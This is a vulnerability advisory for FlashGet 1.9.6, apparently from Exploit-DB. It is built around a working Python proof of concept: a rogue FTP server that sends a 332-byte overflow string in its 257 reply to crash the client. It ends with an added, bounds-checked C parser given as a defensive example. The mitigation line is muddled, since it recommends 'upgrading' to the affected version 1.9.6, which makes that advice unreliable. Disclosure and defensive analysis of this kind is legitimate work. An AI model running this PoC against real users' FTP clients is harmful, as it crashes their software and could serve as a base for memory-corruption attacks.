Vendor: FlashGet
By: Milad Karimi
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 119
Product Name: FlashGet
Affected Version From: 1.9.6
Affected Version To: 1.9.6
Patch Exists: YES
Related CWE: N/A
CPE: a:flashget:flashget:1.9.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2020

FlashGet 1.9.6 – Denial of Service (PoC)

A denial of service vulnerability exists in FlashGet 1.9.6. A remote attacker can send a specially crafted FTP request with a long string in the PWD command to cause a buffer overflow, resulting in a denial of service condition. The vulnerability is due to insufficient boundary checks when handling FTP requests. In the PoC below, the long string (332 characters) is delivered in the server's 257 reply to the client's PWD command.

Mitigation:

Upgrade to the latest version of FlashGet 1.9.6 or later.

Exploit-DB raw data:

# Exploit Title: FlashGet 1.9.6 - Denial of Service (PoC)
# Date: 2020-05-02
# Author: Milad Karimi
# Tested on: Kali Linux
# Software Link: http://www.flashget.com/en/download.htm?uid=undefined
# Version: 1.9.6
# CVE : N/A

#!/usr/bin/python

from time import sleep
from socket import *

res = [
    '220 WELCOME!! :x\r\n',
    '331 Password required for %s.\r\n',
    '230 User %s logged in.\r\n',
    '250 CWD command successful.\r\n',
    '257 "%s/" is current directory.\r\n' # <-- %s B0f :x
    ]

buf = 'A' * 332

s = socket(AF_INET, SOCK_STREAM)
s.bind(('0.0.0.0', 21))
s.listen(1)
print '[+] listening on [FTP] 21 ...\n'
c, addr = s.accept()
c.send(res[0])

user = ''

for i in range(1, len(res)):
    req = c.recv(1024)
    print '[*][CLIENT] %s' % (req)
    tmp = res[i]
    if(req.find('USER') != -1):
        req = req.replace('\r\n', '')
        user = req.split('\x20', 1)[1]
        tmp %= user
    if(req.find('PASS') != -1):
        tmp %= user
    if(req.find('PWD') != -1):
        tmp %= buf    
    print '[*][SERVER] %s' % (tmp)    
    c.send(tmp)

sleep(5)
c.close()
s.close()

print '[+] DONE'
 
# Discovered By : Milad Karimi
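
Added example, not part of the original advisory and not FlashGet's code: a bounds-checked C parser for the FTP 257 (PWD) reply, showing the kind of boundary check the description says is missing. `parse_pwd_reply` and `FTP_PATH_MAX` are hypothetical names, the 260-byte limit is an assumption, and the sample reply in `main` is constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FTP_PATH_MAX 260  /* assumed client-side limit, not taken from FlashGet */

/* Extract the quoted directory from an FTP 257 reply (RFC 959) into out.
 * Returns 0 on success, -1 if the reply is malformed or the path does not
 * fit in outsz bytes including the NUL. Never writes past out[outsz - 1]. */
int parse_pwd_reply(const char *line, char *out, size_t outsz)
{
    size_t n = 0;
    const char *p;

    if (line == NULL || out == NULL || outsz == 0)
        return -1;
    out[0] = '\0';
    if (strncmp(line, "257 ", 4) != 0 || (p = strchr(line + 4, '"')) == NULL)
        return -1;
    for (p++; *p != '\0' && *p != '\r' && *p != '\n'; p++) {
        if (*p == '"') {
            if (p[1] != '"') {          /* closing quote: path is complete */
                out[n] = '\0';
                return 0;
            }
            p++;                        /* "" is an escaped quote */
        }
        if (n + 1 >= outsz) {           /* would overflow: reject the reply */
            out[0] = '\0';
            return -1;
        }
        out[n++] = *p;
    }
    out[0] = '\0';                      /* line ended before the closing quote */
    return -1;
}

int main(void)
{
    char reply[400], dir[FTP_PATH_MAX];
    /* Constructed input: a 257 reply whose quoted path is 332 'A's plus '/'. */
    memset(reply, 'A', sizeof reply);
    memcpy(reply, "257 \"", 5);
    memcpy(reply + 5 + 332, "/\" is current directory.\r\n", 27);
    printf("%d\n", parse_pwd_reply(reply, dir, sizeof dir));
    return 0;
}
```

A client that receives -1 should drop the reply and treat the server as misbehaving instead of truncating silently, since a truncated path would point at a different directory.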